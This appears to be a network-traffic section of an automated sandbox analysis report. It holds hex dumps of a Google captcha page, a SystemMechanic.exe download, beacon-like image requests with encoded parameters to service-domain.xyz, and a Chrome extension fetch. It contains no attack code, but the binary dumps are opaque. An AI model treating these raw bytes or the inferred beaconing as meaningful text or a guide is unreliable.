2024-04-26 15:11:33 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-26 15:11:33 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 53 64 38 71 76 4a 6c 6f 35 63 4f 71 69 57 30 48 65 69 61 66 70 32 50 30 69 55 30 72 76 35 35 77 4b Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="Sd8qvJlo5cOqiW0Heiafp2P0iU0rv55wK
2024-04-26 15:11:33 UTC	960	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49745	156.146.43.65	443	5548	C:\Windows\System32\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:40 UTC	211	OUT	HEAD /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: download.iolo.net
2024-04-26 15:11:41 UTC	637	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:11:41 GMT Content-Type: application/octet-stream Content-Length: 59721128 Connection: close Server: BunnyCDN-MI1-974 CDN-PullZone: 1654350 CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028 CDN-RequestCountryCode: US Cache-Control: public, max-age=259200 Last-Modified: Tue, 19 Mar 2024 23:10:10 GMT CDN-StorageServer: LA-457 CDN-FileServer: 775 CDN-ProxyVer: 1.04 CDN-RequestPullSuccess: True CDN-RequestPullCode: 206 CDN-CachedAt: 03/25/2024 22:23:32 CDN-EdgeStorageId: 625 CDN-Status: 200 CDN-RequestId: 7aa69d70aa5a784c2f53149106fc3412 CDN-Cache: HIT Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49747	156.146.43.65	443	5548	C:\Windows\System32\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:41 UTC	262	OUT	GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 19 Mar 2024 23:10:10 GMT User-Agent: Microsoft BITS/7.8 Host: download.iolo.net
2024-04-26 15:11:42 UTC	637	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:11:42 GMT Content-Type: application/octet-stream Content-Length: 59721128 Connection: close Server: BunnyCDN-MI1-974 CDN-PullZone: 1654350 CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028 CDN-RequestCountryCode: US Cache-Control: public, max-age=259200 Last-Modified: Tue, 19 Mar 2024 23:10:10 GMT CDN-StorageServer: LA-457 CDN-FileServer: 775 CDN-ProxyVer: 1.04 CDN-RequestPullSuccess: True CDN-RequestPullCode: 206 CDN-CachedAt: 03/25/2024 22:23:32 CDN-EdgeStorageId: 625 CDN-Status: 200 CDN-RequestId: 7174f28d0ea2a6d88c764e4b32916091 CDN-Cache: HIT Accept-Ranges: bytes
2024-04-26 15:11:42 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 20 3b ec 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 c4 8a 03 00 56 04 00 00 00 00 00 fa e2 8a 03 00 20 00 00 00 00 8b 03 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 8f 03 00 02 00 00 54 70 8f 03 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL ;"0V @ Tp`
2024-04-26 15:11:42 UTC	16384	IN	Data Raw: 00 2a 00 00 01 10 00 00 00 00 32 00 24 56 00 03 1c 00 00 01 13 30 04 00 51 00 00 00 13 00 00 11 02 7b 34 00 00 04 2c 01 2a 1a 8d 64 00 00 01 25 16 72 16 2c 00 70 a2 25 17 72 64 2c 00 70 a2 25 18 72 9c 20 00 70 a2 25 19 72 b2 2c 00 70 a2 0a 16 0b 2b 0f 06 07 9a 0c 02 08 28 29 00 00 06 07 17 58 0b 07 06 8e 69 32 eb 02 17 7d 34 00 00 04 2a 00 00 00 1b 30 06 00 16 01 00 00 14 00 00 11 72 9c 20 00 70 0a 28 d9 00 00 0a 72 00 2d 00 70 28 2a 00 00 0a 0b 72 18 2d 00 70 0c 28 a2 00 00 0a 72 25 18 00 70 28 2a 00 00 0a 0d 20 02 00 00 80 16 28 38 00 00 0a 13 04 7e ed 00 00 0a 08 17 6f 39 00 00 0a 13 05 11 05 39 8f 00 00 00 72 82 2d 00 70 08 03 28 47 00 00 0a 13 06 7e ed 00 00 0a 11 06 17 6f 39 00 00 0a 2c 72 06 03 6f e8 00 00 0a 2c 0a 11 05 06 6f ee 00 00 0a 2b 5f 09 Data Ascii: 2$V0Q{4,d%r,p%rd,p%r p%r,p+()Xi2}40r p(r-p(r-p(r%p(* (8~o99r-p(G~o9,ro,o+_
2024-04-26 15:11:42 UTC	16384	IN	Data Raw: 1e 00 00 0a a2 25 19 07 a2 28 41 00 00 0a 72 11 00 00 70 16 16 28 09 00 00 06 72 0b 6b 00 70 1a 8d 1c 00 00 01 25 16 06 6f d6 00 00 0a a2 25 17 06 6f 70 00 00 0a a2 25 18 06 6f 1e 00 00 0a a2 25 19 07 a2 28 41 00 00 0a 28 17 00 00 06 15 28 18 00 00 06 2a 00 00 00 01 10 00 00 02 00 3b 00 32 6d 00 0a 00 00 00 00 c2 7e 3c 00 00 04 2c 28 72 39 6b 00 70 04 6f c3 01 00 0a 8c c9 00 00 01 28 36 00 00 0a 72 be 6b 00 70 16 28 c4 01 00 0a 26 04 17 6f c5 01 00 0a 2a 00 00 00 1b 30 02 00 34 00 00 00 3a 00 00 11 28 c6 01 00 0a 0a 06 6f c7 01 00 0a 6f c8 01 00 0a 1f 64 5a 06 6f c7 01 00 0a 6f c9 01 00 0a 58 20 59 02 00 00 fe 04 16 fe 01 0b de 05 26 de 00 16 2a 07 2a 01 10 00 00 00 00 00 00 2d 2d 00 03 1c 00 00 01 1b 30 03 00 43 00 00 00 3b 00 00 11 02 73 a3 01 00 0a 25 Data Ascii: %(Arp(rkp%o%op%o%(A((;2m~<,(r9kpo(6rkp(&o04:(oodZooX Y&**--0C;s%
2024-04-26 15:11:42 UTC	16384	IN	Data Raw: 00 4c 6f 61 64 00 55 6e 6c 6f 61 64 00 41 64 64 00 4c 6f 61 64 65 64 00 67 65 74 5f 49 73 53 70 65 63 69 66 69 65 64 00 49 6e 74 65 72 6c 6f 63 6b 65 64 00 67 65 74 5f 50 47 54 72 61 63 6b 69 6e 67 45 6e 61 62 6c 65 64 00 73 65 74 5f 50 47 54 72 61 63 6b 69 6e 67 45 6e 61 62 6c 65 64 00 73 65 74 5f 48 61 6e 64 6c 65 64 00 43 61 6e 63 65 6c 65 64 00 53 79 73 74 65 6d 4d 65 63 68 61 6e 69 63 31 37 49 6e 73 74 61 6c 6c 65 64 00 54 68 69 73 53 79 73 74 65 6d 4d 65 63 68 61 6e 69 63 49 6e 73 74 61 6c 6c 65 64 00 54 68 69 73 42 72 61 6e 64 49 6e 73 74 61 6c 6c 65 64 00 41 63 74 69 76 65 43 6f 72 65 49 6e 73 74 61 6c 6c 65 64 00 54 68 69 73 56 65 72 73 69 6f 6e 49 6e 73 74 61 6c 6c 65 64 00 44 6f 74 4e 65 74 49 6e 73 74 61 6c 6c 65 64 00 56 43 52 65 64 69 73 74 Data Ascii: LoadUnloadAddLoadedget_IsSpecifiedInterlockedget_PGTrackingEnabledset_PGTrackingEnabledset_HandledCanceledSystemMechanic17InstalledThisSystemMechanicInstalledThisBrandInstalledActiveCoreInstalledThisVersionInstalledDotNetInstalledVCRedist
2024-04-26 15:11:42 UTC	16384	IN	Data Raw: 6f 00 20 00 73 00 65 00 6e 00 64 00 20 00 74 00 65 00 6c 00 65 00 6d 00 65 00 74 00 72 00 79 00 20 00 64 00 61 00 74 00 61 00 00 31 54 00 65 00 6c 00 65 00 6d 00 65 00 74 00 72 00 79 00 20 00 45 00 78 00 63 00 65 00 70 00 74 00 69 00 6f 00 6e 00 3a 00 20 00 7b 00 30 00 7d 00 00 13 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 00 0f 5c 00 65 00 6e 00 74 00 69 00 6e 00 66 00 00 03 5c 00 00 07 65 00 70 00 69 00 00 07 65 00 61 00 6b 00 00 07 65 00 62 00 69 00 00 11 42 00 72 00 61 00 6e 00 64 00 69 00 6e 00 67 00 00 3d 44 00 65 00 62 00 75 00 67 00 20 00 4d 00 6f 00 64 00 65 00 20 00 4e 00 6f 00 74 00 20 00 59 00 65 00 74 00 20 00 49 00 6d 00 70 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 65 00 64 00 00 17 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 Data Ascii: o send telemetry data1Telemetry Exception: {0}Software\\entinf\epieakebiBranding=Debug Mode Not Yet ImplementedProductNa
2024-04-26 15:11:42 UTC	16384	IN	Data Raw: 6f 00 77 00 6e 00 6c 00 6f 00 61 00 64 00 65 00 72 00 22 00 20 00 2f 00 45 00 4e 00 41 00 42 00 4c 00 45 00 00 80 91 2f 00 63 00 68 00 61 00 6e 00 67 00 65 00 20 00 2f 00 74 00 6e 00 20 00 22 00 5c 00 69 00 6f 00 6c 00 6f 00 20 00 74 00 65 00 63 00 68 00 6e 00 6f 00 6c 00 6f 00 67 00 69 00 65 00 73 00 5c 00 41 00 63 00 74 00 69 00 76 00 65 00 4d 00 65 00 73 00 73 00 65 00 6e 00 67 00 65 00 72 00 2d 00 50 00 72 00 69 00 76 00 61 00 63 00 79 00 47 00 75 00 61 00 72 00 64 00 69 00 61 00 6e 00 22 00 20 00 2f 00 45 00 4e 00 41 00 42 00 4c 00 45 00 01 80 8f 2f 00 63 00 68 00 61 00 6e 00 67 00 65 00 20 00 2f 00 74 00 6e 00 20 00 22 00 5c 00 69 00 6f 00 6c 00 6f 00 20 00 74 00 65 00 63 00 68 00 6e 00 6f 00 6c 00 6f 00 67 00 69 00 65 00 73 00 5c 00 41 00 63 00 74 Data Ascii: ownloader" /ENABLE/change /tn "\iolo technologies\ActiveMessenger-PrivacyGuardian" /ENABLE/change /tn "\iolo technologies\Act
2024-04-26 15:11:42 UTC	16384	IN	Data Raw: 1c 07 19 ba 09 c8 91 18 00 1c 73 2c 26 ff e1 49 d4 df b2 8c e9 77 fa b0 24 95 3f d9 5c 80 75 85 31 65 cc 11 4c 79 f5 75 34 9f 39 1f 03 16 de 5b 68 55 17 4a c7 a7 e4 00 38 90 02 20 b7 b6 61 c2 6f 1f 45 d3 8a 5f a0 f6 a0 83 99 db e6 f2 79 e7 26 9b 83 38 ee 94 24 09 d1 25 d7 63 bf 67 ff 84 d8 31 c7 5a 32 64 d1 93 a8 92 53 72 00 2e 92 02 50 27 47 30 69 d1 62 c4 9f 79 16 35 ed d3 2d f7 11 b6 b1 22 f2 c0 2d a7 24 c5 e3 68 5a f1 0b 4c ba eb 6e 0c 36 37 3b aa 0b a5 1e 8a 00 bc 30 78 b7 d3 e8 cc a3 d0 f8 e4 53 a8 bb 68 81 ed e3 94 d3 b9 2e 2e 6b b5 75 00 c7 23 00 15 75 b3 4e 44 fc f9 17 d1 7c e6 7c e1 e7 d1 89 d4 ab 30 39 00 37 0e 88 17 4e 8a 5b 69 9d 1c 41 ed 8d 37 a1 f9 81 5f 96 fd 3c be de 3d 00 d1 46 c6 cb f0 a3 4b ae c7 e4 3f 3c 69 18 0d 88 3e df 2c a9 17 74 Data Ascii: s,&Iw$?\u1eLyu49[hUJ8 aoE_y&8$%cg1Z2dSr.P'G0iby5-"-$hZLn67;0xSh..ku#uND\|\|097N[iA7_<=FK?<i>,t
2024-04-26 15:11:42 UTC	16384	IN	Data Raw: 00 00 11 c2 00 00 00 00 00 22 84 01 00 00 00 00 44 08 03 00 00 00 00 88 10 06 00 00 00 00 10 21 0c 00 00 00 00 20 42 18 00 00 00 00 40 84 24 0a d6 05 00 00 00 00 4a 86 33 00 00 00 00 40 84 30 00 00 00 00 80 08 61 00 00 00 00 00 11 c2 00 00 00 00 00 22 84 01 00 00 00 00 44 08 03 00 00 00 00 88 10 06 00 00 00 00 10 21 0c 00 00 00 00 20 42 18 00 00 00 00 40 84 30 00 00 00 00 80 08 61 00 00 00 00 00 11 c2 00 00 00 00 00 22 84 01 00 00 00 00 44 08 03 00 00 00 00 88 10 06 00 00 00 00 10 21 0c 00 00 00 00 20 42 18 00 00 00 00 40 84 30 00 00 00 00 80 08 61 00 00 00 00 00 11 c2 00 00 00 00 00 22 84 01 00 00 00 00 44 08 03 00 00 00 00 88 10 06 00 00 00 00 10 21 0c 00 00 00 00 20 42 12 05 eb 02 00 00 00 00 25 c3 19 00 00 00 00 20 42 18 00 00 00 00 40 84 30 00 00 00 Data Ascii: "D! B@$J3@0a"D! B@0a"D! B@0a"D! B% B@0
2024-04-26 15:11:42 UTC	16384	IN	Data Raw: a6 fe 77 de b1 4e 32 93 1c 33 46 2d d7 cc 54 62 c4 08 eb 94 48 eb 7a fe 79 bd 77 c2 71 d6 19 40 49 31 00 10 49 75 fb ed af c6 53 4f b3 ce 88 bc ae 17 fe aa f7 4f f9 ae 0a 3d 3d d6 29 e6 bc 64 52 e5 13 27 aa 62 ab ad 55 b9 d5 d6 2a 9f b0 89 14 4f 58 67 0d 5a a1 af 57 dd af be aa ee 17 5e 50 d7 df 5e 50 ef eb af 4b 05 3e 76 ca 26 4c d0 d8 cb af 50 ac ba da 3a 25 da 72 39 cd d9 7b 2f 0d cc 7f df ba 04 28 29 06 00 a2 c9 f3 34 fe be 07 94 1c 33 c6 ba 24 f2 fa e6 cc d1 7b c7 1d a3 ec d2 a5 d6 29 4e f1 d2 69 95 6d b4 b1 ca 36 d9 44 e5 9b 6c a2 b2 4d 26 28 35 66 8c e4 79 d6 69 ab 97 cb aa 6f ce db ea f9 d7 6b ea 7d fd 5f ea 7d ed 5f ea 9d fd 96 94 cb 59 97 39 25 b3 e3 14 8d fa c9 05 bc 97 c4 01 2b ee bc 43 8b 7f 7a a9 75 06 50 72 0c 00 44 56 e5 d6 db 68 cc 95 57 Data Ascii: wN23F-TbHzywq@I1IuSOO==)dR'bU*OXgZW^P^PK>v&LP:%r9{/()43${)Nim6DlM&(5fyiok}_}_Y9%+CzuPrDVhW
2024-04-26 15:11:42 UTC	16384	IN	Data Raw: 5b e3 36 07 0f 46 80 3b 02 fa 17 1f 01 00 00 b4 68 14 a1 89 fe 9b ef 92 5f b3 5a 3a 02 f5 03 0b 80 47 e5 7d 56 00 b4 40 00 a1 b1 63 a5 63 10 15 95 d9 d0 00 b3 a1 51 3a 46 41 39 a9 14 ec 4e 7f 6d 4e a6 0a 16 00 8f b2 d6 af f3 dd 44 c0 c8 cc 59 d2 11 88 8a 2a 38 7c 38 02 43 87 4a c7 28 a8 ec b2 65 80 e3 48 c7 a0 7e 60 01 f0 28 3b 91 80 9d f0 d7 8e 80 a1 f1 e3 a1 fb 68 7f 74 fa 14 7f cd 79 eb b7 d0 c4 89 be da 01 10 00 b2 2b 3f 94 8e 40 fd c4 02 e0 51 56 6b 2b ac d6 56 e9 18 05 a5 87 42 88 ed bc 8b 74 0c a2 a2 a9 d8 73 6f 7f ad 00 70 5d 64 97 2c 91 4e 41 fd c4 02 e0 51 76 57 97 2f 9f bb 45 a6 4d 93 8e 40 54 14 46 6d ad ff 76 00 4c a7 61 b5 b4 48 c7 a0 7e 62 01 f0 2a db 46 6e f9 32 e9 14 05 17 9a 38 11 e6 90 21 d2 31 a8 d0 b8 0a 00 b1 dd 76 87 66 9a d2 31 0a Data Ascii: [6F;h_Z:G}V@ccQ:FA9NmNDY8\|8CJ(eH~`(;hty+?@QVk+VBtsop]d,NAQvW/EM@TFmvLaH~bFn28!1vf1

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	49768	3.80.150.121	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:12:32 UTC	197	OUT	GET /google_ifi_ico.png?rnd=ao4JqF5ZqI8kKu4EL0Gn_LYPC4GYPC9IYPC8OYPC6GYPC8NXPC7NYPC7IYPC7NXPC0VYPC2NXPC3TVPC8 HTTP/1.1 Host: service-domain.xyz Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 15:12:32 UTC	590	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 15:12:32 GMT Content-Type: image/png Content-Length: 95 Connection: close Access-Control-Allow-Origin: * Cache-control: no-cache="set-cookie" Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200 Set-Cookie: AWSELBCORS=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200;SECURE;SAMESITE=None
2024-04-26 15:12:32 UTC	95	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 00 ec 00 00 00 ec 01 79 28 71 bd 00 00 00 01 49 44 41 54 b8 ed 82 46 56 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR szzsBIT\|dpHYsy(qIDATFVIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	49769	3.80.150.121	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:12:32 UTC	196	OUT	GET /google_ifi_ico.png?rnd=Zd3zh3ZT3XmF8YI2eYS_RGXB9UGXB3SGXB6CHXB7UGXB6FIXB4FHXB1SGXB9FIXB9HGXB6FIXB9JJXB0 HTTP/1.1 Host: service-domain.xyz Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 15:12:32 UTC	590	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 15:12:32 GMT Content-Type: image/png Content-Length: 95 Connection: close Access-Control-Allow-Origin: * Cache-control: no-cache="set-cookie" Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200 Set-Cookie: AWSELBCORS=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200;SECURE;SAMESITE=None
2024-04-26 15:12:32 UTC	95	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 00 ec 00 00 00 ec 01 79 28 71 bd 00 00 00 01 49 44 41 54 64 62 e7 d8 a9 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR szzsBIT\|dpHYsy(qIDATdbIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	49776	142.250.64.193	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:12:35 UTC	310	OUT	GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1 Connection: Keep-Alive Cache-Control: no-cache Host: clients2.googleusercontent.com
2024-04-26 15:12:36 UTC	565	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPpQX5vFdS6pAXqPQuz85UPOTBUXtRfuR8W1ezHqH6ofOvPeLWbkM435fTRT2wR8XuvP88s Accept-Ranges: bytes Content-Length: 26186 X-Goog-Hash: crc32c=i5zIOg== Server: UploadServer Date: Thu, 25 Apr 2024 17:23:13 GMT Expires: Fri, 25 Apr 2025 17:23:13 GMT Cache-Control: public, max-age=31536000 Age: 78563 Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 15:12:36 UTC	690	IN	Data Raw: 43 72 32 34 03 00 00 00 1c 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 8f fb bf 5c 37 63 94 3c b0 ee 01 c4 b5 a6 9a b1 9f 46 74 6f 16 38 a0 32 27 35 dd f0 71 6b 0e dc f6 25 cb b2 ed ea fb 32 d5 af 1e 03 43 03 46 f0 a7 39 db 23 96 1d 65 e5 78 51 f0 84 b0 0e 12 ac 0e 5b dc c9 d6 4c 7c 00 d5 b8 1b 88 33 3e 2f da eb aa f7 1a 75 c2 ae 3a 54 de 37 8f 10 d2 28 e6 84 79 4d 15 b4 f3 bd 3f 56 d3 3c 3f 18 ab fc 2e 05 c0 1e 08 31 b6 61 d0 fd 9f 4f 3f 64 0d 17 93 bc ad 41 c7 48 be 00 27 a8 4d 70 42 92 05 54 a6 6d b8 de 56 6e 20 49 70 ee 10 3e 6b d2 7c 31 bd 1b 6e a4 3c 46 62 9f 08 66 93 f9 2a 51 31 a8 db b5 9d b9 0f 73 e8 a0 09 32 01 e9 7b 2a 8a 36 a0 cf 17 b0 50 70 9d a2 f9 a4 6f 62 4d Data Ascii: Cr240"0H0\7c<Fto82'5qk%2CF9#exQ[L\|3>/u:T7(yM?V<?.1aO?dAH'MpBTmVn Ip>k\|1n<FbfQ1s2{*6PpobM
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 6d 46 aa bb 68 49 1d 72 6b 3e 29 26 77 db e5 af d5 14 09 ba 8a 5b fb 7c 5f 12 62 f5 5e 36 d7 e6 ef c4 89 45 2d 24 dc 50 d8 b5 1e 8b c9 bb bf dd 3f 45 78 2c 66 ee 3b 59 18 a6 75 f1 67 4e b2 a4 34 0e 97 56 9f a4 02 20 b0 3e 92 a7 35 32 ba ca 4a 5c 5e ee 59 2b 23 74 9e 92 c4 35 58 43 d9 0f 5e 35 db 94 e5 10 84 b0 c1 79 4a 94 d9 ad 99 86 73 48 5c 61 ea d2 d6 41 1d c9 a1 1f 57 d2 88 75 b2 f6 77 b6 cf 97 5c 22 59 e9 3c c2 a5 af e3 78 a6 f5 c6 f2 f6 0f ab fb 3d ae fa b8 77 8c e3 f7 88 ee a0 35 fa 5c a8 0c b0 1c 03 b2 29 72 46 6d 02 03 01 00 01 12 80 02 31 7c ed 26 5f 9e 5d 85 0e f4 74 8c 35 13 26 b2 45 6f 71 73 d3 d8 af 7c 00 e2 30 52 c3 74 c0 3e ac 8f a3 85 97 a8 f7 28 2a e9 75 16 06 af cd 7c e9 46 71 a1 ef dd 02 3f 7a 17 c6 e3 06 0a 0d 18 d3 80 d7 18 ad cd 4c Data Ascii: mFhIrk>)&w[\|_b^6E-$P?Ex,f;YugN4V >52J\^Y+#t5XC^5yJsH\aAWuw\"Y<x=w5\)rFm1\|&_]t5&Eoqs\|0Rt>(*u\|Fq?zL
2024-04-26 15:12:36 UTC	1255	IN	Data Raw: 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 02 23 49 44 41 54 78 01 8d 53 bf 4f 54 41 10 fe e6 b8 5f e2 c5 13 e9 d4 3b 89 85 b1 f3 0f 30 e4 9e 56 36 da 58 58 d9 9b 48 fc 07 34 11 42 62 63 69 a3 a5 52 f8 07 d8 19 23 ef 90 84 58 69 62 a1 46 0b 48 54 82 14 dc 11 0e c8 dd ee 0e 33 b3 ef 5d 20 40 c2 4b 36 bb fb 66 e7 9b 6f be 99 21 c8 57 9b fd 96 d0 08 9e 72 e0 16 5c 20 d9 a1 0b 1e 8c 20 f7 6c 87 fe f7 f2 3f 70 0a ef 66 76 5f 4e a6 54 7b f6 bd 05 b8 f9 a1 d1 1e e4 4e 4c f0 01 39 00 87 83 40 9e 29 29 22 b8 69 70 1e 71 5f 14 b1 9a a3 1c c5 2e 67 7d 24 bb 63 e6 0c 84 3c a6 05 20 24 7a 89 8e 60 0a c8 a2 ab a3 32 31 30 63 63 41 58 59 19 b0 82 28 83 dc 99 71 a9 5e a2 57 77 27 d0 1c 2b 91 6a 63 d1 e3 6e f7 ee Data Ascii: 